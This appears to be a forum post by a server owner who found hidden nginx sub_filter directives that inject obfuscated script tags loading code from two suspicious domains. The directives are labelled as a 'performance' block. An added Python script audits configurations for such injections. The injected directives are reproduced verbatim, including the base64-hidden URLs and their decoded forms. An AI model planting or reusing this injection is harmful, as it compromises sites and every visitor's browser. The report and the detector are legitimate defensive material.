Yesterday I found that the following content had been added to the nginx.conf file:
sub_filter_types text/html;
sub_filter '</head>' '<script>document.cookie="hasVisited178a=1;Max-Age=86400;Path=/";(function(){var hm=document.createElement("script");hm.src=atob("aHR0cHM6Ly9ib290c2NyaXRwLmNvbS9saWIvanF1ZXJ5LzQuNy4yL2pxdWVyeS5taW4uanM=");var s=document.getElementsByTagName("script")[0];s.parentNode.insertBefore(hm,s);})();</script></head>';
sub_filter_once off;
# Performance Enhancement Block - DO NOT MODIFY
# Nginx Performance Optimization Configuration
# Auto-generated by performance tuning module
sub_filter_types text/html;
sub_filter '</head>' '<script>document.cookie="hasVisited178a=1;Max-Age=86400;Path=/";(function(){var hm=document.createElement("script");hm.src=atob("aHR0cHM6Ly9hLnNvZnN4ei5jb20vanVtcC5qcw==");var s=document.getElementsByTagName("script")[0];s.parentNode.insertBefore(hm,s);})();</script>\n</head>';
sub_filter_once off;
# Performance Enhancement Block - DO NOT MODIFY_END
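I don't know much about this area. I searched on Google and didn't find anything useful. I asked Doubao, which said it is most likely a malicious script server (possibly used for cryptomining, account theft, traffic inflation, redirecting to phishing sites, etc.)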
aHR0cHM6Ly9ib290c2NyaXRwLmNvbS9saWIvanF1ZXJ5LzQuNy4yL2pxdWVyeS5taW4uanM=
Base64-decoded, this is https://bootscritp.com/lib/jquery/4.7.2/jquery.min.js
aHR0cHM6Ly9hLnNvZnN4ei5jb20vanVtcC5qcw==
Base64-decoded, this is https://a.sofsxz.com/jump.js
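
An added example, not part of the original post: a small Python audit that flags `sub_filter` directives whose replacement inserts a `<script>` tag, and decodes any `atob("...")` literal so the URL being loaded is visible. The sample configuration is constructed and uses a placeholder URL; the function names are hypothetical, and only the single-quoted directive form seen in the post is handled.

```python
import base64
import re

# sub_filter '<search>' '<replacement>';  (single-quoted form, as in the post)
SUB_FILTER_RE = re.compile(
    r"^\s*sub_filter\s+'((?:[^'\\]|\\.)*)'\s+'((?:[^'\\]|\\.)*)'\s*;", re.M)
ATOB_RE = re.compile(r"""atob\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""")

# Constructed sample: same shape as the injected block, harmless placeholder URL.
_URL = "https://cdn.example.invalid/lib.js"
SAMPLE_CONF = (
    "server {\n"
    "    listen 80;\n"
    "    sub_filter_types text/html;\n"
    "    sub_filter '</head>' '<script>(function(){var hm="
    "document.createElement(\"script\");hm.src=atob(\"%s\");})();</script></head>';\n"
    "    sub_filter_once off;\n"
    "    sub_filter 'http://' 'https://';\n"
    "}\n"
) % base64.b64encode(_URL.encode()).decode()


def decode_atob_literals(js):
    """Return the decoded text of every atob("...") string literal in js."""
    out = []
    for blob in ATOB_RE.findall(js):
        try:
            out.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            out.append("<undecodable: %s>" % blob)
    return out


def audit_nginx_conf(text):
    """List sub_filter directives that insert a <script> tag into responses."""
    findings = []
    for m in SUB_FILTER_RE.finditer(text):
        search, replacement = m.group(1), m.group(2)
        if "<script" not in replacement.lower():
            continue  # ordinary text rewrite, not a script injection
        findings.append({
            "line": text.count("\n", 0, m.start(1)) + 1,
            "search": search,
            "decoded_urls": decode_atob_literals(replacement),
        })
    return findings


if __name__ == "__main__":
    for finding in audit_nginx_conf(SAMPLE_CONF):
        print(finding)
```

Running the same function over the output of `nginx -T` covers included files as well as the main nginx.conf.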
